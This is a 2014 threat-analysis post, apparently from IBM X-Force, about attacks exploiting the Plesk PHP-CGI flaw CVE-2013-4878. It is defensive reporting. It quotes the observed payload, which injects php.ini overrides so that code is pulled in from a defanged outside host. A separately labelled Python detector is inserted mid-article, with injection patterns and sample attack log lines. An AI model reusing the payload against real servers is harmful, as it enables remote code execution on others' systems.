Six Month Old Vulnerability Exploit Attempt

January 13, 2014

Background on Six Month Old Vulnerability Exploit Attempt

The IBM X-Force Threat Analysis Service (XFTAS) reports on vulnerabilities that need to be brought to the attention of our customers. Such was the case in June of 2013. We found a report on a Plesk Control Panel vulnerability (CVE-2013-4878) and provided the following assessment at that time:

Critical Plesk Vulnerability

Exploit code has been released that is reported to target versions 8.6, 9.0, 9.2, 9.3, and 9.5.4 of Plesk running on the Linux and FreeBSD operating systems. Plesk is a commercial software web administration package that allows an administrator to easily set up new websites, email accounts, and DNS entries via a web-based interface. The vulnerability is reported to rely on a non-default setting in Plesk which exposes the entire /usr/bin directory to the Internet. An attacker who successfully exploits this vulnerability can gain shell access to the victim’s server. Customers should verify that the following Plesk configuration entry is not present:

ScriptAlias /phppath/ "/usr/bin/"

Plesk administrators should contact their distribution channels for more information regarding configuration best practices.

Event

During the weekend of January 4th, the SOC began seeing attacks on our customers that appeared to be attempting to exploit this vulnerability. The payload of these attacks looked like this:

-d+allow_url_include=on+-d+safe_mode=off+-d+suhosin.simulation=on+-d+max_execution_time=0+-d+open_basedir=none+-d+auto_prepend_file=hXXp://isp.vc/packets.txt+-d+cgi.force_redirect=0+-d+cgi.redirect_status_env=0+-n
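The two things a defender wants to check from the assessment above are whether the non-default ScriptAlias is present and whether requests carrying "-d" php.ini overrides like the payload shown are reaching the web server. The following is an added example (not code from the original report or from IBM) that does both over an Apache configuration string and constructed access-log lines; the IP addresses, paths and hostnames in the sample data are made up for the example.

```python
import re
from urllib.parse import unquote_plus

# php.ini directives the observed payload overrides with "-d"; any of these in a
# query string is a strong signal of a PHP-CGI argument-injection attempt.
RISKY_DIRECTIVES = {
    "allow_url_include", "auto_prepend_file", "safe_mode", "open_basedir",
    "cgi.force_redirect", "cgi.redirect_status_env", "suhosin.simulation",
}
# The non-default Plesk entry that exposes /usr/bin (and so php-cgi) to the web.
VULNERABLE_ALIAS = re.compile(r'^\s*ScriptAlias\s+/phppath/\s+"?/usr/bin/?"?', re.I | re.M)
# Apache combined log format; only the client IP and request path are needed here.
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(?:GET|POST) (\S+) HTTP/[\d.]+"')

# Constructed sample log lines (not real traffic); the URL is defanged like the report.
SAMPLE_LOG = [
    '198.51.100.7 - - [04/Jan/2014:03:12:45 +0000] "GET /phppath/php?-d+allow_url_include%3Don'
    '+-d+safe_mode%3Doff+-d+auto_prepend_file%3DhXXp://example.invalid/x.txt+-n HTTP/1.1" 404 209',
    '198.51.100.8 - - [04/Jan/2014:03:13:02 +0000] "GET /index.php?page=home HTTP/1.1" 200 5123',
    '198.51.100.9 - - [04/Jan/2014:03:13:40 +0000] "GET /cgi-bin/php?-d+open_basedir%3Dnone HTTP/1.0" 404 209',
]


def config_exposes_usr_bin(apache_conf: str) -> bool:
    """True if the ScriptAlias mapping /phppath/ to /usr/bin is present in the config text."""
    return VULNERABLE_ALIAS.search(apache_conf) is not None


def injected_directives(request_path: str) -> list[str]:
    """Return the risky php.ini directives a request tries to set via "-d" in its query string."""
    if "?" not in request_path:
        return []
    # '+' separators and %3D encodings become spaces and '=' after decoding.
    query = unquote_plus(request_path.split("?", 1)[1])
    return [name for name in re.findall(r"-d\s+([\w.]+)=", query) if name in RISKY_DIRECTIVES]


def scan_access_log(lines) -> list[tuple[str, str, list[str]]]:
    """Return (client_ip, path_without_query, directives) for requests matching the attack pattern."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        ip, path = m.groups()
        found = injected_directives(path)
        if found:
            hits.append((ip, path.split("?", 1)[0], found))
    return hits


if __name__ == "__main__":
    for ip, path, directives in scan_access_log(SAMPLE_LOG):
        print(f"{ip} requested {path} overriding {', '.join(directives)}")
```

Run against a real access log by passing the file's lines to scan_access_log; a hit on a host whose config also satisfies config_exposes_usr_bin is the combination the report warns about.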

Actions Taken

The SOC escalated the event to management and began contacting affected customers. Further analysis of the attack revealed only one attacking IP, 80.82.78.9. It also gave a strong indication that the attack was against the Internet as a whole and not any specific customer or industry. While researching the attack, we saw that other organizations, such as ISC, were aware of activity from this IP address as well. In their report, however, the attack they noted appeared to be targeting potentially vulnerable Linksys devices.

Data Seen

The top ten signatures seen in connection with this attack were:

Count     Signature
206,235   TCP_Service_Sweep
10,394    HTTP: Detect PHP-CGI Remote code Execution vulnerability
3,477     PHP Remote Code Execution
2,212     TCP_Probe_Other
1,803     ICMP_Flood
820       SERVER-WEBAPP PHP-CGI remote file include attempt
453       PHP CGI Query String Parameter Handling Information Disclosure and DoS Vulnerability (34804)
450       SYNFlood
227       TCP SYN Host Sweep
177       PHP CGI Query String Parameter Handling Code Injection Vulnerability (34790)

This is a common tactic among attackers. First they scan for open ports and then, based on their recon, select an appropriate attack vector from the exploits they have in stock.

Summary and Recommendations

Attacks such as this one only reinforce the XFTAS recommendation to keep operating systems and applications patched in a timely manner. Attacks against new vulnerabilities do not always occur immediately after their announcement. Sometimes, as in this case, it may be months before the vulnerability is exploited.

Bryan Ivey
Cyber Threat and Intelligence Analyst, IBM X-Force
